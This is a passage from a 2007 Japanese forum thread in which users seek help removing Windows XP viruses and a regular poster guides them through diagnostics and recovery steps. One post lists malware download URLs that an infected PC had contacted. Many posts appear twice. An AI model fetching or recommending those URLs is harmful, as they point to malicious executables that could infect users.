Svchost.exeが見当たりません。一覧にwindows\drivers-autoもないです。
一人で使ってるからログオンとかがないのでそのせいでしょうか??
5個あるのはsvch0st.exeじゃなくてsvchost.exeです。
PC内をsvchost.exeで検索したらWINDOWS\system32に一つと、
WINDOWS\PrefetchにSVCHOST.EXE-3530F672.pfというのが出てきました。
SVCHOST.EXE-3530F672.pfはゴミ箱に入れたほうがいいでしょうか?
今シマンテックでもう一度スキャンしたらDownloader.Trojanというのが検出された・・・orz
>>285
いいえ言い切れませんよ。
P2Pをしているのはわかったので、
バックグラウンドで動くexeは安易に切っては
ならないと警告を与えたまでです。
>Antinnyの中には"C:\Program Files\<ランダムにコピーされたフォルダ>\<ランダムにコピーされた名前>.exe"
知っています。
いいえ言い切れませんよ。
P2Pをしているのはわかったので、
バックグラウンドで動くexeは安易に切っては
ならないと警告を与えたまでです。
>Antinnyの中には"C:\Program Files\<ランダムにコピーされたフォルダ>\<ランダムにコピーされた名前>.exe"
知っています。
288 : ◆N9P3SuvBPo :2007/01/18(木) 02:09:51
>287
P2Pソフトを使う人って何で使うのかが疑問ですね。
「タダで手に入るから」という下らない理由が大半でしょうがw
>286
>C:\WINDOWS\PrefetchにSVCHOST.EXE
正体を確認してみましょう。
そのファイルのプロパティ画面を開いてみて
「会社名」はなんと言う会社になっているか教えていただけるとありがたいです。
Microsoft Corporation以外であれば黒の可能性大です。
P2Pソフトを使う人って何で使うのかが疑問ですね。
「タダで手に入るから」という下らない理由が大半でしょうがw
>286
>C:\WINDOWS\PrefetchにSVCHOST.EXE
正体を確認してみましょう。
そのファイルのプロパティ画面を開いてみて
「会社名」はなんと言う会社になっているか教えていただけるとありがたいです。
Microsoft Corporation以外であれば黒の可能性大です。
289 :名無しさん@お腹いっぱい。:2007/01/18(木) 02:25:10
不明なアプリケーションで拡張子を変えたりしても会社名はわかりませんでした。
落としたのはエロと部落地名総監です・・・
落としたのはエロと部落地名総監です・・・
290 : ◆N9P3SuvBPo :2007/01/18(木) 02:33:32
>289
会社名は不明?
ふむ…さらに調査を続けましょうか。
ttp://www.virustotal.com/
「参照」ボタンをクリックして、C:\WINDOWS\Prefetch\SVCHOST.EXEを選択して
Sendというところをクリックするとスキャンが始まります。
しばらく待っていればスキャンが終わり、結果が表示されますので
そのログを貼りつけてもらえますか。
会社名は不明?
ふむ…さらに調査を続けましょうか。
ttp://www.virustotal.com/
「参照」ボタンをクリックして、C:\WINDOWS\Prefetch\SVCHOST.EXEを選択して
Sendというところをクリックするとスキャンが始まります。
しばらく待っていればスキャンが終わり、結果が表示されますので
そのログを貼りつけてもらえますか。
291 :名無しさん@お腹いっぱい。:2007/01/18(木) 02:43:10
AntiVir 7.3.0.21 01.17.2007 no virus found
Authentium 4.93.8 01.16.2007 no virus found
Avast 4.7.936.0 01.17.2007 no virus found
AVG 386 01.17.2007 no virus found
BitDefender 7.2 01.17.2007 no virus found
CAT-QuickHeal 9.00 01.17.2007 no virus found
ClamAV devel-20060426 01.17.2007 no virus found
DrWeb 4.33 01.17.2007 no virus found
eSafe 7.0.14.0 01.17.2007 no virus found
eTrust-InoculateIT 23.73.115 01.17.2007 no virus found
eTrust-Vet 30.3.3332 01.17.2007 no virus found
Ewido 4.0 01.17.2007 no virus found
Fortinet 2.82.0.0 01.17.2007 no virus found
F-Prot 3.16f 01.16.2007 no virus found
F-Prot4 4.2.1.29 01.16.2007 no virus found
Ikarus T3.1.0.27 01.09.2007 no virus found
Kaspersky 4.0.2.24 01.17.2007 no virus found
McAfee 4941 01.17.2007 no virus found
Microsoft 1.1904 01.17.2007 no virus found
NOD32v2 1985 01.17.2007 no virus found
Norman 5.80.02 01.17.2007 no virus found
Panda 9.0.0.4 01.16.2007 no virus found
Prevx1 V2 01.17.2007 no virus found
Sophos 4.13.0 01.16.2007 no virus found
Sunbelt 2.2.907.0 01.12.2007 no virus found
TheHacker 6.0.3.148 01.14.2007 no virus found
UNA 1.83 01.16.2007 no virus found
VBA32 3.11.2 01.16.2007 no virus found
VirusBuster 4.3.19:9 01.17.2007 no virus found
eTrustのオンラインスパイウェアスキャンで出たのとは違うのかな・・・?
Authentium 4.93.8 01.16.2007 no virus found
Avast 4.7.936.0 01.17.2007 no virus found
AVG 386 01.17.2007 no virus found
BitDefender 7.2 01.17.2007 no virus found
CAT-QuickHeal 9.00 01.17.2007 no virus found
ClamAV devel-20060426 01.17.2007 no virus found
DrWeb 4.33 01.17.2007 no virus found
eSafe 7.0.14.0 01.17.2007 no virus found
eTrust-InoculateIT 23.73.115 01.17.2007 no virus found
eTrust-Vet 30.3.3332 01.17.2007 no virus found
Ewido 4.0 01.17.2007 no virus found
Fortinet 2.82.0.0 01.17.2007 no virus found
F-Prot 3.16f 01.16.2007 no virus found
F-Prot4 4.2.1.29 01.16.2007 no virus found
Ikarus T3.1.0.27 01.09.2007 no virus found
Kaspersky 4.0.2.24 01.17.2007 no virus found
McAfee 4941 01.17.2007 no virus found
Microsoft 1.1904 01.17.2007 no virus found
NOD32v2 1985 01.17.2007 no virus found
Norman 5.80.02 01.17.2007 no virus found
Panda 9.0.0.4 01.16.2007 no virus found
Prevx1 V2 01.17.2007 no virus found
Sophos 4.13.0 01.16.2007 no virus found
Sunbelt 2.2.907.0 01.12.2007 no virus found
TheHacker 6.0.3.148 01.14.2007 no virus found
UNA 1.83 01.16.2007 no virus found
VBA32 3.11.2 01.16.2007 no virus found
VirusBuster 4.3.19:9 01.17.2007 no virus found
eTrustのオンラインスパイウェアスキャンで出たのとは違うのかな・・・?
292 :名無しさん@お腹いっぱい。:2007/01/18(木) 02:44:27
Aditional Information
File size: 16490 bytes
MD5: e438f4e5f19dcd029fbeb356b0a438db
SHA1: 8070a967b2fa0c4ff318937cb14e37e112889999
これで全部です。
File size: 16490 bytes
MD5: e438f4e5f19dcd029fbeb356b0a438db
SHA1: 8070a967b2fa0c4ff318937cb14e37e112889999
これで全部です。
293 : ◆N9P3SuvBPo :2007/01/18(木) 02:53:13
>291-292
no virus found=ウイルス無し
ということなのでそちらは問題ありません。
no virus found=ウイルス無し
ということなのでそちらは問題ありません。
遅くなりましたが、まぁそんなとこですな
今日早いので落ちますね
どうも。あとはお任せします
部落地名総監。。。
一時ニュー速で流行ったな。
あと公務員棒給名簿、芸能界(ry
今日早いので落ちますね
どうも。あとはお任せします
部落地名総監。。。
一時ニュー速で流行ったな。
あと公務員棒給名簿、芸能界(ry
295 : ◆N9P3SuvBPo :2007/01/18(木) 02:59:27
>294
俺ももう限界!
おやすみなさい
俺ももう限界!
おやすみなさい
296 :名無しさん@お腹いっぱい。:2007/01/18(木) 03:03:08
お二方ありがとうございました!
297 : ◆N9P3SuvBPo :2007/01/18(木) 03:05:54
おっと最後に>286にて
>Downloader.Trojanというのが検出された
とありますが、こちらのほうは検出されたウイルスの名前やファイル名などを
検索して自分の力でやってもらえますか。
では
>Downloader.Trojanというのが検出された
とありますが、こちらのほうは検出されたウイルスの名前やファイル名などを
検索して自分の力でやってもらえますか。
では
298 :名無しさん@お腹いっぱい。:2007/01/18(木) 03:45:20
you tubeを始め動画や画像が見れなくなりましたorz
他にも本来表示されるべき物が表示されず□の中に赤い×が表示されるようになりました
前は見れたのに突然見れないようになりだしました。
ウイルスが原因なんでしょうか?どなたかわかるかたがいたらどうか教えてください。
OSはWINDOWS XPです。
他にも本来表示されるべき物が表示されず□の中に赤い×が表示されるようになりました
前は見れたのに突然見れないようになりだしました。
ウイルスが原因なんでしょうか?どなたかわかるかたがいたらどうか教えてください。
OSはWINDOWS XPです。
>>228-230
で教えてもらった方法全て試してもダメでした。レジストリまでいじったのに・・・
なんつーしぶといウイルスだ
しかしノートンでは検出0だったのに他のソフトだと腐るほどウイルスでてきますね
ノートン先生のセキュリティってザルですか?
もうお手上げなのでリカバリ逝ってきます(゚Д゚)ノ
で教えてもらった方法全て試してもダメでした。レジストリまでいじったのに・・・
なんつーしぶといウイルスだ
しかしノートンでは検出0だったのに他のソフトだと腐るほどウイルスでてきますね
ノートン先生のセキュリティってザルですか?
もうお手上げなのでリカバリ逝ってきます(゚Д゚)ノ
300 :名無しさん@お腹いっぱい。:2007/01/18(木) 15:05:28
301 :名無しさん@お腹いっぱい。:2007/01/18(木) 17:41:48
俺も前に
add.rr121.com/
220.162.247.180
http://search.mse.co.jp/
http://add.rr121.com/l/New/svchost32.exe
http://add.rr121.com/l/New/csrss.exe
http://www.y988.com/l/Url168.txt
http://asd.rr121.com/l/New/services.exe
http://asd.rr121.com/l/New/conime.exe
http://add.rr121.com/l/New/smss.exe
http://www.y988.com/tempbak.exe
http://207.44.136.40/public/personalwu.dat
http://download.lavasoft.de.edgesuite.net/public/personalwu.dat
http://download.lavasoft.de/public/personalwu.dat
http://ads1.msn.com/library/dap.js
に勝手につながってたな
そん時はファイヤーウォールでアク禁にしてウィルス除去したけど。
msconfigで変なのあったりして
add.rr121.com/
220.162.247.180
http://search.mse.co.jp/
http://add.rr121.com/l/New/svchost32.exe
http://add.rr121.com/l/New/csrss.exe
http://www.y988.com/l/Url168.txt
http://asd.rr121.com/l/New/services.exe
http://asd.rr121.com/l/New/conime.exe
http://add.rr121.com/l/New/smss.exe
http://www.y988.com/tempbak.exe
http://207.44.136.40/public/personalwu.dat
http://download.lavasoft.de.edgesuite.net/public/personalwu.dat
http://download.lavasoft.de/public/personalwu.dat
http://ads1.msn.com/library/dap.js
に勝手につながってたな
そん時はファイヤーウォールでアク禁にしてウィルス除去したけど。
msconfigで変なのあったりして
302 :名無しさん@お腹いっぱい。:2007/01/18(木) 20:35:50
W32.Fujacks.AF
W32.Fujacks.AF は、ネットワーク共有へ自分自身をコピーすることによって拡散するワームです。
このワームは、すべてのパーティションの root ドライブへ自分自身をコピーし、
ローカルコンピュータ上で見付けたすべての .exe ファイルに感染します。
またこれは、いくつかのセキュリティ関連のプロセスやサービスを終了させます。
http://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.fujacks.af.html
W32.Fujacks.AF は、ネットワーク共有へ自分自身をコピーすることによって拡散するワームです。
このワームは、すべてのパーティションの root ドライブへ自分自身をコピーし、
ローカルコンピュータ上で見付けたすべての .exe ファイルに感染します。
またこれは、いくつかのセキュリティ関連のプロセスやサービスを終了させます。
http://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.fujacks.af.html
303 :名無しさん@お腹いっぱい。:2007/01/18(木) 21:21:26
【使用OS】Windows XP SP1
【MicrosoftUpdate】してません
【使用セキュリティソフト】ウイルスバスター2007 体験版
【セキュリティソフトの定義ファイルは最新の状態であるか】違います
【ルータの有無】NEC WR6600H
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】PE VIRUT.B
【どんな症状が出るか】不明
【症状が出る前に何をやったか】不明
【症状を解決しようとどのような処置を取ったか】
回線を抜いた状態でリカバリー後、ノートン2007パッケージ版をインストールしようと思っても
「Windows インストーラの認識中に問題があったのでセットアップのインストールができません。」
と出ます。
そのため別PCでバスターの体験版をCD-Rに焼いてインストールしました
検索すると350件くらい感染
削除・隔離できませんが7件くらいです。
リカバリーしても駆除できないので困ってます
助けてください!!
【MicrosoftUpdate】してません
【使用セキュリティソフト】ウイルスバスター2007 体験版
【セキュリティソフトの定義ファイルは最新の状態であるか】違います
【ルータの有無】NEC WR6600H
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】PE VIRUT.B
【どんな症状が出るか】不明
【症状が出る前に何をやったか】不明
【症状を解決しようとどのような処置を取ったか】
回線を抜いた状態でリカバリー後、ノートン2007パッケージ版をインストールしようと思っても
「Windows インストーラの認識中に問題があったのでセットアップのインストールができません。」
と出ます。
そのため別PCでバスターの体験版をCD-Rに焼いてインストールしました
検索すると350件くらい感染
削除・隔離できませんが7件くらいです。
リカバリーしても駆除できないので困ってます
助けてください!!
304 :名無しさん@お腹いっぱい。:2007/01/18(木) 21:43:01
【使用OS】 Windows XP SP2
【MicrosoftUpdate】 常時更新
【使用セキュリティソフト】 ノートンインターネットセキュリティ2006
【セキュリティソフトの定義ファイルは最新の状態であるか】 更新しました
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Backdoor.Win32.Agent.xs と Trojan.Win32.KillFiles.ki
【症状が出る前に何をやったか】 不明です
【症状を解決しようとどのような処置を取ったか】 手動駆除をしようとウィルス情報を検索しました
インストールしているのはNIS2006ですがカスペエンジンでオンラインスキャンした結果ウィルスiが見つかりました
もう3週間ほど経っていますがカスペの方ではまだ解決方がでていません。↓がその情報です
http://translate.google.com/translate?sourceid=navclient&hl=ja&u=http%3a%2f%2fwww%2eviruslist%2ecom%2fen%2fviruses%2fencyclopedia%3fvirusid%3d125040
http://www.viruslistjp.com/viruses/encyclopedia/?virusid=117550
なお感染場所は
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP137\A0010167.exe感染: Backdoor.Win32.Agent.xs
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP137\A0010168.exe感染: Backdoor.Win32.Agent.xs
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP147\A0010713.SCR 感染: Trojan.Win32.KillFiles.ki
となっています。
よろしくお願いします
【MicrosoftUpdate】 常時更新
【使用セキュリティソフト】 ノートンインターネットセキュリティ2006
【セキュリティソフトの定義ファイルは最新の状態であるか】 更新しました
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Backdoor.Win32.Agent.xs と Trojan.Win32.KillFiles.ki
【症状が出る前に何をやったか】 不明です
【症状を解決しようとどのような処置を取ったか】 手動駆除をしようとウィルス情報を検索しました
インストールしているのはNIS2006ですがカスペエンジンでオンラインスキャンした結果ウィルスiが見つかりました
もう3週間ほど経っていますがカスペの方ではまだ解決方がでていません。↓がその情報です
http://translate.google.com/translate?sourceid=navclient&hl=ja&u=http%3a%2f%2fwww%2eviruslist%2ecom%2fen%2fviruses%2fencyclopedia%3fvirusid%3d125040
http://www.viruslistjp.com/viruses/encyclopedia/?virusid=117550
なお感染場所は
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP137\A0010167.exe感染: Backdoor.Win32.Agent.xs
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP137\A0010168.exe感染: Backdoor.Win32.Agent.xs
C:\System Volume Information\_restore{E22BDD9D-9D72-4519-9780-75307FB35B4B}\RP147\A0010713.SCR 感染: Trojan.Win32.KillFiles.ki
となっています。
よろしくお願いします
305 : ◆N9P3SuvBPo :2007/01/18(木) 22:10:21
>304
>System Volume Information
これはシステムの復元のバックアップを保存するフォルダなので、
マイコンピュータのプロパティ→復元タブ→復元無効→即復元有効で処理できます。
それでもう一度スキャンして見付からなければOKです。
問題は>303だな
リカバリしても直らんだと!?
ちゃんと説明書の手順に沿って、HDDフォーマットしてOS入れたんですよね。
ちょっとだけ調査に付き合ってもらえますか?
デスクトップにあるマイコンピュータをダブルクリックして開く
↓
Cドライブのアイコンをダブルクリックして開く
↓
その中にあるwindowsフォルダを開く
↓
その中にあるexplorer.exe(マイコンピュータのアイコン)のファイルを
右クリック→プロパティで以下の情報を教えてもらえますか?
・ファイルサイズ
・更新日
など
なお、このファイルは正規のファイルですので絶対に削除しないように
>System Volume Information
これはシステムの復元のバックアップを保存するフォルダなので、
マイコンピュータのプロパティ→復元タブ→復元無効→即復元有効で処理できます。
それでもう一度スキャンして見付からなければOKです。
問題は>303だな
リカバリしても直らんだと!?
ちゃんと説明書の手順に沿って、HDDフォーマットしてOS入れたんですよね。
ちょっとだけ調査に付き合ってもらえますか?
デスクトップにあるマイコンピュータをダブルクリックして開く
↓
Cドライブのアイコンをダブルクリックして開く
↓
その中にあるwindowsフォルダを開く
↓
その中にあるexplorer.exe(マイコンピュータのアイコン)のファイルを
右クリック→プロパティで以下の情報を教えてもらえますか?
・ファイルサイズ
・更新日
など
なお、このファイルは正規のファイルですので絶対に削除しないように
306 :名無しさん@お腹いっぱい。:2007/01/18(木) 22:25:20
>>303のいうリカバリとやらの手順についても書いて貰いたい
ウィルスの見つかった場所もあるとなお可
ウィルスの見つかった場所もあるとなお可
explorer.exe
更新日時:2003年4月3日
ファイルサイズ:974kB
VAIO PCV-W502B です。
OS CDがないので
説明書通りに
VAIOリカバリーツールからリカバリーしました
感染場所は
さまざまで Explorerを起動すると バスターが
「Exploere.exe でウイルスが見つかりました」(駆除隔離出来ませんでした)
と出ます
また バスターの検索をすると
「PccVScan.exeでウイルスが・・・」
とでます
更新日時:2003年4月3日
ファイルサイズ:974kB
VAIO PCV-W502B です。
OS CDがないので
説明書通りに
VAIOリカバリーツールからリカバリーしました
感染場所は
さまざまで Explorerを起動すると バスターが
「Exploere.exe でウイルスが見つかりました」(駆除隔離出来ませんでした)
と出ます
また バスターの検索をすると
「PccVScan.exeでウイルスが・・・」
とでます
309 : ◆N9P3SuvBPo :2007/01/18(木) 23:53:14
>308
>「Exploere.exe でウイルスが見つかりました」
うわーやはり感染かー
正規のファイルに感染だからもう一度リカバリ…え?
>説明書通りに
>VAIOリカバリーツールからリカバリーしました
マジー!?
>「Exploere.exe でウイルスが見つかりました」
うわーやはり感染かー
正規のファイルに感染だからもう一度リカバリ…え?
>説明書通りに
>VAIOリカバリーツールからリカバリーしました
マジー!?
まじです!
リカバリーは今週だけで3回しました・・・
リカバリーは今週だけで3回しました・・・
311 : ◆N9P3SuvBPo :2007/01/19(金) 00:10:34
>310
ブートセクタないしマスターブートレコードもやられてんじゃないのか。
つかどーすればいいのか、俺の手に追えないんだけど…
他の方から何かアドバイスがあるかも知れません。
ブートセクタないしマスターブートレコードもやられてんじゃないのか。
つかどーすればいいのか、俺の手に追えないんだけど…
他の方から何かアドバイスがあるかも知れません。
312 :名無しさん@お腹いっぱい。:2007/01/19(金) 00:39:32
複合感染型
複合感染型ウイルスはシステム領域感染型とファイル感染型の両方の特徴を持つウイルスです。
COMやEXEファイルに感染するだけでなく、ハードディスクやフロッピーディスクのシステム領域にも感染します。
このウイルスに感染したフロッピーディスクからコンピュータを起動すると、ウイルスがメモリに常駐するばかりか、ハードディスクのシステム領域にも感染します。
ただしシステム領域感染は先に説明したように最新のOSでは活動ができないため、この複合感染型ウイルスも現在ではほとんど存在しないものとなりました。
複合感染型ウイルスはシステム領域感染型とファイル感染型の両方の特徴を持つウイルスです。
COMやEXEファイルに感染するだけでなく、ハードディスクやフロッピーディスクのシステム領域にも感染します。
このウイルスに感染したフロッピーディスクからコンピュータを起動すると、ウイルスがメモリに常駐するばかりか、ハードディスクのシステム領域にも感染します。
ただしシステム領域感染は先に説明したように最新のOSでは活動ができないため、この複合感染型ウイルスも現在ではほとんど存在しないものとなりました。
313 :名無しさん@お腹いっぱい。:2007/01/19(金) 03:44:39
314 :名無しさん@お腹いっぱい。:2007/01/19(金) 10:05:11
SONYに問い合わせしてみた?
315 :名無しさん@お腹いっぱい。:2007/01/19(金) 16:31:24
>303
fdisk /mbr
でマスターブートレコードを修復。
回復コンソールでブートセクタ修復。
fdisk /mbr
でマスターブートレコードを修復。
回復コンソールでブートセクタ修復。
316 : ◆N9P3SuvBPo :2007/01/19(金) 18:01:23
>313
俺が持っているNECのPC(OS:XPSP2)にもリカバリ領域があるけど、
その領域がウイルスによって破壊される可能性は、決してゼロではない。
と取り説に書いてあった。
だから、セットアップ完了後、速攻でリカバリCDを作成した。
>315
回復コンソールという手段は、こっちも考えていたのですが、
303さんはOSのCDが無いようなので、回復コンソールは使えないものと思われます。
回復コンソールをインストールして、OSの起動選択メニューから起動させる手や
6枚のFDDに回復コンソールをインストールして、そこから回復コンソールを
起動させる手もあるようですが。
マスターブートレコードの修復は
fixmbr
ブートセクタの修復は
fixboot [ドライブ名]
じゃなかった?間違っているかもしれんけど…
てか、fdisk /mbrでもMBRの修復ができるんだ…
俺が持っているNECのPC(OS:XPSP2)にもリカバリ領域があるけど、
その領域がウイルスによって破壊される可能性は、決してゼロではない。
と取り説に書いてあった。
だから、セットアップ完了後、速攻でリカバリCDを作成した。
>315
回復コンソールという手段は、こっちも考えていたのですが、
303さんはOSのCDが無いようなので、回復コンソールは使えないものと思われます。
回復コンソールをインストールして、OSの起動選択メニューから起動させる手や
6枚のFDDに回復コンソールをインストールして、そこから回復コンソールを
起動させる手もあるようですが。
マスターブートレコードの修復は
fixmbr
ブートセクタの修復は
fixboot [ドライブ名]
じゃなかった?間違っているかもしれんけど…
てか、fdisk /mbrでもMBRの修復ができるんだ…
317 :名無しさん@お腹いっぱい。:2007/01/19(金) 18:26:58
>316
CDないのか。すまん。
丁寧な説明には頭が下がります。
CDないのか。すまん。
丁寧な説明には頭が下がります。
318 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:44:15
この前ここで教えてもらった通りにスパイウェアに感染したウィルスを駆除するようにしたんですができませんでした
もうドライブの中をすべてフォーマットしたりして直せませんかね?
もうドライブの中をすべてフォーマットしたりして直せませんかね?
319 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:57:18
>318
どのソフトで何をどうしたらどうなったのか・・・
と言ってくれないとレスしようがないです。
どのソフトで何をどうしたらどうなったのか・・・
と言ってくれないとレスしようがないです。
320 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:05:45
TrustyFilesを使った辺りからいきなりなりました。
Windows XPです。
Windows XPです。
321 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:07:12
322 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:16:32
>>321
セーフモードで起動してスキャン→なぜか無理でした
莫大なファイルの中から感染ファイルを見つける→とても無理でした
ウィルスバスター→今所持金が800円です…
すべてのドライブのフォーマット→できますか?これがリカバリという奴ですか?
セーフモードで起動してスキャン→なぜか無理でした
莫大なファイルの中から感染ファイルを見つける→とても無理でした
ウィルスバスター→今所持金が800円です…
すべてのドライブのフォーマット→できますか?これがリカバリという奴ですか?
323 : ◆N9P3SuvBPo :2007/01/19(金) 20:22:31
>318
>152ですよね?
疲れてるから他の方の指示に従ってください
>152ですよね?
疲れてるから他の方の指示に従ってください
324 : ◆N9P3SuvBPo :2007/01/19(金) 20:42:19
>322
OSはWindowsXPでしたよね。
「システムの復元」でも直らない?
セーフモードで起動して、システムの復元で正常に動作していた日付を
選んで復元。
OSはWindowsXPでしたよね。
「システムの復元」でも直らない?
セーフモードで起動して、システムの復元で正常に動作していた日付を
選んで復元。
325 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:52:02
>>324
なるほど、今すぐやってみます!
なるほど、今すぐやってみます!
回復コンソールは
この別PCについていたOSのCDでも大丈夫なんですか?
そのCDをインストールしてもWindowsのUpdateが出来ないと聞いたので
使用はためらっていたのですが・・・
この別PCについていたOSのCDでも大丈夫なんですか?
そのCDをインストールしてもWindowsのUpdateが出来ないと聞いたので
使用はためらっていたのですが・・・
327 : ◆N9P3SuvBPo :2007/01/19(金) 21:04:16
>326
別PCのOSは何?
別PCのOSは何?
328 : ◆N9P3SuvBPo :2007/01/19(金) 22:15:41
303の別PCのOSがXPであれば、次の指示が出せるんですが…
XP SP2です
330 : ◆N9P3SuvBPo :2007/01/19(金) 22:55:23
>329
そのCDで回復コンソールにログオンできるかだな。
最初に問題のPCを起動させて、BIOSの設定
(たぶん起動して一番最初に表示されるメーカーのロゴが出てきたらF2?を押す)
で、CD-ROMドライブを一番目に起動するように設定する。
そしてCD-ROMドライブを開いて、そのOSのCDを入れてPCを起動する。
CDから起動できれば、"青色の画面"が表示されて「セットアップの開始」というのが出てくる。
ここで修復[R]を押せば回復コンソールに入れるはず。(真っ暗な画面になる)
画面の指示に従って、Administratorのパスワードを入力して[Enter]を押す。
パスワードを設定していなければ、そのまま[Enter]を押す。
で、回復コンソールにログオンできると、以下の文字が表示されます
C:\WINDOWS>
ここまで確認してください。
そのCDで回復コンソールにログオンできるかだな。
最初に問題のPCを起動させて、BIOSの設定
(たぶん起動して一番最初に表示されるメーカーのロゴが出てきたらF2?を押す)
で、CD-ROMドライブを一番目に起動するように設定する。
そしてCD-ROMドライブを開いて、そのOSのCDを入れてPCを起動する。
CDから起動できれば、"青色の画面"が表示されて「セットアップの開始」というのが出てくる。
ここで修復[R]を押せば回復コンソールに入れるはず。(真っ暗な画面になる)
画面の指示に従って、Administratorのパスワードを入力して[Enter]を押す。
パスワードを設定していなければ、そのまま[Enter]を押す。
で、回復コンソールにログオンできると、以下の文字が表示されます
C:\WINDOWS>
ここまで確認してください。
331 :名無しさん@お腹いっぱい。:2007/01/19(金) 23:40:50
助ける気あるの?
復元なんてしても99%のウイルスはウイルスごと一緒に復元しますけど?
回復コンソールも大半が複雑なウイルスは駆除出来ない
リカバリがお勧め
その後カスペやNODといったまともなソフトで免疫つけるべし
ただし最近はリカバリでも消せないウイルスも存在する
復元なんてしても99%のウイルスはウイルスごと一緒に復元しますけど?
回復コンソールも大半が複雑なウイルスは駆除出来ない
リカバリがお勧め
その後カスペやNODといったまともなソフトで免疫つけるべし
ただし最近はリカバリでも消せないウイルスも存在する
332 : ◆N9P3SuvBPo :2007/01/19(金) 23:49:22
>331
やれるだけやってみてるんだけどな
まあ、ダメ元でってことで
やれるだけやってみてるんだけどな
まあ、ダメ元でってことで
333 : ◆N9P3SuvBPo :2007/01/20(土) 00:13:13
どこかで詰まってるのかな…
C:\WINDOWS>
でないですね・・・
普通に起動してしまいます・・・
でないですね・・・
普通に起動してしまいます・・・
335 : ◆N9P3SuvBPo :2007/01/20(土) 00:22:12
>334
普通にWindowsが起動しましたか…
BIOSの設定でCD-ROMドライブを一番最初に起動するように設定して、
OSのCDを入れたんですよね。
もしかして、BIOSの設定画面の言語が日本語じゃなくて英語で分からないとか?
普通にWindowsが起動しましたか…
BIOSの設定でCD-ROMドライブを一番最初に起動するように設定して、
OSのCDを入れたんですよね。
もしかして、BIOSの設定画面の言語が日本語じゃなくて英語で分からないとか?
CDから起動は出来たんですけど
修復をおしてもなにも始まらず
そのうちインストール画面に
キャンセル押すと 普通に起動
こんな感じです
修復をおしてもなにも始まらず
そのうちインストール画面に
キャンセル押すと 普通に起動
こんな感じです
337 : ◆N9P3SuvBPo :2007/01/20(土) 00:36:54
>336
修復{R]押してしばらく待ったが
勝手にインストール画面に持っていかれたってことなの?
修復{R]押してしばらく待ったが
勝手にインストール画面に持っていかれたってことなの?
勝手にじゃないです。
修復押してもなにもならないので
他のボタンを押すとインストール画面に・・・
修復押してもなにもならないので
他のボタンを押すとインストール画面に・・・
339 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:43:24
>>331
>復元なんてしても99%のウイルスはウイルスごと一緒に復元しますけど?
んなぁこたぁ大方判ってるってw
悟ってやれ 。◆N9P3SuvBPoは
リカバリ領域も駄目な
末期癌の患者をあきらめず、見守っているんだ
俺なら悪魔のテンプレでも試すかなぁーでその後リカバリ
ただしvaioは残念ながら使わんよ。
警戒している人間は、まずリカバリCDか起動ディスクなりを準備しておくのが世の常ってもんだ。あとバックアップもな。
>復元なんてしても99%のウイルスはウイルスごと一緒に復元しますけど?
んなぁこたぁ大方判ってるってw
悟ってやれ 。◆N9P3SuvBPoは
リカバリ領域も駄目な
末期癌の患者をあきらめず、見守っているんだ
俺なら悪魔のテンプレでも試すかなぁーでその後リカバリ
ただしvaioは残念ながら使わんよ。
警戒している人間は、まずリカバリCDか起動ディスクなりを準備しておくのが世の常ってもんだ。あとバックアップもな。
340 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:47:46
>>339
バックアップって最低限だと具体的にどこをバックアップしてればいいの?
バックアップって最低限だと具体的にどこをバックアップしてればいいの?
341 : ◆N9P3SuvBPo :2007/01/20(土) 00:51:16
>338
回復コンソールが起動できれば、もうひと足掻きできたのですが。
リカバリしても直らない、ノートンのインストールが失敗する。
これはもうメーカー修理に出すしかないと言いたいのだけど、
保証期限が切れていたら有料になるしな…
>339
ここまで来たら本当にどうしたら良いのかサッパリです。
>俺なら悪魔のテンプレでも試すかなぁー
まさか!?
PC初心者板の「エロサイト見たら…助けて下さい!」スレ(今は無い)で、
一時期流行ったと言われる、『パソコンのトラブル解消法』ですな。
OS起動不可能になって強制的にリカバリさせる、禁断のテンプレ
別名:強制リカバリテンプレ
回復コンソールが起動できれば、もうひと足掻きできたのですが。
リカバリしても直らない、ノートンのインストールが失敗する。
これはもうメーカー修理に出すしかないと言いたいのだけど、
保証期限が切れていたら有料になるしな…
>339
ここまで来たら本当にどうしたら良いのかサッパリです。
>俺なら悪魔のテンプレでも試すかなぁー
まさか!?
PC初心者板の「エロサイト見たら…助けて下さい!」スレ(今は無い)で、
一時期流行ったと言われる、『パソコンのトラブル解消法』ですな。
OS起動不可能になって強制的にリカバリさせる、禁断のテンプレ
別名:強制リカバリテンプレ
342 : ◆N9P3SuvBPo :2007/01/20(土) 00:55:30
>340
二度と取り戻せない大事なデータ
二度と取り戻せない大事なデータ
>>340
良く考えてみ。
>>341
もう駄目ならソニーステーションでもいいんじゃないんですか?
ぐぐっても駄目でしょ?
出費覚悟でね。
俺なら何とかリカバリ領域まで何とかもっていくよ。おそらく
ソニーは使ったことがないが
良く考えてみ。
>>341
もう駄目ならソニーステーションでもいいんじゃないんですか?
ぐぐっても駄目でしょ?
出費覚悟でね。
俺なら何とかリカバリ領域まで何とかもっていくよ。おそらく
ソニーは使ったことがないが
344 : ◆N9P3SuvBPo :2007/01/20(土) 01:25:41
>343
そう。
「リカバリ領域 修復」や「リカバリ領域の修復方法」で
ぐぐっても有力と言える情報は得られなかった。
メーカーに修理に出すか、リカバリCD取り寄せになるだろう。
残念ながらここまでのようですね…
そう。
「リカバリ領域 修復」や「リカバリ領域の修復方法」で
ぐぐっても有力と言える情報は得られなかった。
メーカーに修理に出すか、リカバリCD取り寄せになるだろう。
